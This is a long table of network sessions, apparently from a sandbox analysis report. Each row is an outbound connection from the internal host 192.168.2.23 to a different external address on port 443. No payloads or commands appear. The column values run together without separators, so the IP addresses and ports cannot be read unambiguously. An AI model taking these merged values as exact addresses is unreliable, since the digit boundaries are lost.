                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11963192.168.2.234894284.165.74.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11964192.168.2.234863017.13.23.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11965192.168.2.2340150171.147.103.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11966192.168.2.2354740218.120.231.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11967192.168.2.233908440.162.25.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11968192.168.2.234970435.85.192.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11969192.168.2.2338276107.174.174.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11970192.168.2.234346664.148.133.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11971192.168.2.2336132152.47.19.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11972192.168.2.2359912197.70.94.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11973192.168.2.2336202177.166.2.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11974192.168.2.2336188168.254.59.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11975192.168.2.235121240.138.228.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11976192.168.2.2343762142.104.248.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11977192.168.2.2338700140.145.30.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11978192.168.2.236034257.217.12.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11979192.168.2.2334396114.84.71.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11980192.168.2.2356648116.202.174.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11981192.168.2.2360842213.103.28.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11982192.168.2.2350058148.207.59.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11983192.168.2.2360136175.77.245.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11984192.168.2.234146475.140.76.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11985192.168.2.235444246.4.125.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11986192.168.2.2333666202.51.203.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11987192.168.2.2340900162.115.124.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11988192.168.2.2336650136.174.57.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11989192.168.2.236043240.93.250.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11990192.168.2.2346852125.133.107.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11991192.168.2.2352064141.227.213.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11992192.168.2.235890865.81.143.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11993192.168.2.2350578148.186.64.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11994192.168.2.2342864204.217.128.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11995192.168.2.2338094129.233.68.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11996192.168.2.2344090223.182.109.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11997192.168.2.2342810177.123.250.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11998192.168.2.2334794123.39.189.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11999192.168.2.2357208175.132.120.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12000192.168.2.235452675.14.224.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12001192.168.2.2347850196.133.75.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12002192.168.2.2348976216.113.90.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12003192.168.2.235454250.101.171.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12004192.168.2.235493231.140.59.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12005192.168.2.2337044167.139.5.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12006192.168.2.233978067.2.192.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12007192.168.2.2356864185.240.8.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12008192.168.2.234695883.197.68.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12009192.168.2.235622018.175.248.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12010192.168.2.235822863.133.217.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12011192.168.2.2340710163.100.118.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12012192.168.2.233716641.96.214.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12013192.168.2.235404869.19.180.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12014192.168.2.2335758166.102.36.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12015192.168.2.2341882142.240.10.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12016192.168.2.234255678.220.62.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12017192.168.2.234041620.169.192.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12018192.168.2.235548417.3.26.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12019192.168.2.2338816161.97.45.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12020192.168.2.235554480.153.154.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12021192.168.2.236020223.125.241.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12022192.168.2.236039693.176.110.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12023192.168.2.234531094.210.227.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12024192.168.2.2345064204.63.4.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12025192.168.2.2341332159.204.242.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12026192.168.2.2334488105.192.110.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12027192.168.2.2350554132.75.190.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12028192.168.2.2342006128.143.194.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12029192.168.2.2352158153.176.117.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12030192.168.2.2345756153.160.60.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12031192.168.2.2354012179.83.91.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12032192.168.2.234792813.11.66.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12033192.168.2.2351790211.152.232.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12034192.168.2.2358672213.75.210.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12035192.168.2.23515625.19.191.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12036192.168.2.2358138196.156.108.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12037192.168.2.235482872.81.227.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12038192.168.2.234106272.189.58.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12039192.168.2.233969061.55.220.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12040192.168.2.2336448211.12.130.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12041192.168.2.2346028107.70.106.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12042192.168.2.233938050.18.237.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12043192.168.2.2343832216.184.225.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12044192.168.2.235242652.85.46.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12045192.168.2.234888261.20.211.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12046192.168.2.2347160131.235.72.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12047192.168.2.2340812111.214.190.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12048192.168.2.2333894168.14.126.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12049192.168.2.234870082.158.55.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12050192.168.2.2340844183.172.98.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12051192.168.2.234637259.166.118.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12052192.168.2.235352232.252.119.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12053192.168.2.2340104169.65.65.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12054192.168.2.2343284170.59.103.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12055192.168.2.234177825.205.25.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12056192.168.2.2352650202.59.126.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12057192.168.2.2336148206.149.109.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12058192.168.2.234273034.13.150.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12059192.168.2.2344012205.240.68.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12060192.168.2.233687075.93.35.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12061192.168.2.2356228133.190.0.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12062192.168.2.2342510196.68.157.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12063192.168.2.2335258189.219.167.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12064192.168.2.2358982179.218.5.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12065192.168.2.2332996220.156.153.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12066192.168.2.2359080177.220.195.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12067192.168.2.2336012115.209.9.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12068192.168.2.2336680149.96.96.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12069192.168.2.235410876.216.255.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12070192.168.2.2355178120.184.222.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12071192.168.2.234247447.46.129.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12072192.168.2.235801085.168.156.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12073192.168.2.23366609.154.16.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12074192.168.2.2335954172.53.27.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12075192.168.2.2335964123.51.235.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12076192.168.2.2346358202.224.61.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12077192.168.2.235987684.183.35.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12078192.168.2.2358532110.154.33.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12079192.168.2.235371650.206.17.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12080192.168.2.2350432208.195.27.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12081192.168.2.233600467.43.96.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12082192.168.2.2353106158.142.168.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12083192.168.2.234534450.56.159.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12084192.168.2.2341370206.34.154.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12085192.168.2.2337988147.39.38.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12086192.168.2.2357880156.238.62.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12087192.168.2.234916496.54.25.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12088192.168.2.233899047.126.95.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12089192.168.2.235810051.137.80.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12090192.168.2.2342280131.116.164.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12091192.168.2.235323413.125.69.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12092192.168.2.2353198169.31.237.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12093192.168.2.235115432.131.246.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12094192.168.2.2351848187.87.94.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12095192.168.2.2334332187.228.0.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12096192.168.2.2352604175.0.117.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12097192.168.2.2333030182.184.32.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12098192.168.2.2359064147.74.24.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12099192.168.2.234089648.88.74.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12100192.168.2.2358314157.145.55.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12101192.168.2.2351700194.135.67.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12102192.168.2.235731239.122.132.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12103192.168.2.236007044.51.15.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12104192.168.2.2348070145.154.249.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12105192.168.2.2341944165.241.242.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12106192.168.2.2335468119.152.199.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12107192.168.2.2349840170.206.196.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12108192.168.2.2339024199.244.208.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12109192.168.2.233868472.231.214.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12110192.168.2.2342450187.22.219.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12111192.168.2.2343134163.210.132.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12112192.168.2.2345102183.2.143.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12113192.168.2.2341296115.160.211.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12114192.168.2.2334046133.48.35.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12115192.168.2.2360836202.126.9.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12116192.168.2.2356204122.46.253.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12117192.168.2.2350398219.241.179.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12118192.168.2.2352988131.17.215.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12119192.168.2.2338922158.203.35.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12120192.168.2.2342506219.142.25.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12121192.168.2.2356516116.2.172.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12122192.168.2.234937050.144.175.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12123192.168.2.2345074200.157.217.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12124192.168.2.2344000201.231.21.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12125192.168.2.234860699.63.183.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12126192.168.2.23421749.14.198.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12127192.168.2.234415850.94.37.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12128192.168.2.233447839.222.197.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12129192.168.2.234937876.187.110.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12130192.168.2.2356810202.96.201.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12131192.168.2.2338966132.232.182.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12132192.168.2.235861889.65.147.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12133192.168.2.234423048.204.10.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12134192.168.2.2358588122.4.11.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12135192.168.2.234542050.155.199.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12136192.168.2.2346780138.97.78.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12137192.168.2.2355742116.144.46.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12138192.168.2.233417266.205.76.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12139192.168.2.234995019.161.67.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12140192.168.2.234153877.50.204.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12141192.168.2.2340286201.128.55.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12142192.168.2.234476279.123.19.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12143192.168.2.2337908192.105.79.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12144192.168.2.2340168142.156.58.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12145192.168.2.2352858188.35.136.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12146192.168.2.235808876.172.205.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12147192.168.2.23381445.34.212.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12148192.168.2.2342134181.229.84.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12149192.168.2.235298261.105.35.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12150192.168.2.2349966102.255.141.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12151192.168.2.235132213.57.144.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12152192.168.2.2353810162.47.6.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12153192.168.2.234073020.26.29.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12154192.168.2.2341954182.68.15.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12155192.168.2.235445823.131.39.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12156192.168.2.2346018169.136.182.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12157192.168.2.2334872189.5.188.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12158192.168.2.2351544197.92.139.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12159192.168.2.2349892104.194.101.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12160192.168.2.2340522187.140.185.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12161192.168.2.2359766110.73.91.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12162192.168.2.234061675.123.213.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12163192.168.2.234913418.203.155.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12164192.168.2.2348058107.241.194.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12165192.168.2.233780245.167.77.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12166192.168.2.234277848.141.126.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12167192.168.2.236001477.109.182.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12168192.168.2.2355680213.10.124.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12169192.168.2.2350816140.249.211.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12170192.168.2.2337230188.95.57.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12171192.168.2.235830039.45.130.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12172192.168.2.2357410153.37.158.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12173192.168.2.2343748171.174.29.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12174192.168.2.234360898.4.155.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12175192.168.2.2356642136.219.16.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12176192.168.2.2349484115.201.77.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12177192.168.2.234159475.13.226.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12178192.168.2.2350242170.96.109.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12179192.168.2.2353304204.76.240.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12180192.168.2.2336724202.52.81.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12181192.168.2.235593878.3.64.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12182192.168.2.2339206208.221.8.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12183192.168.2.235064262.185.12.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
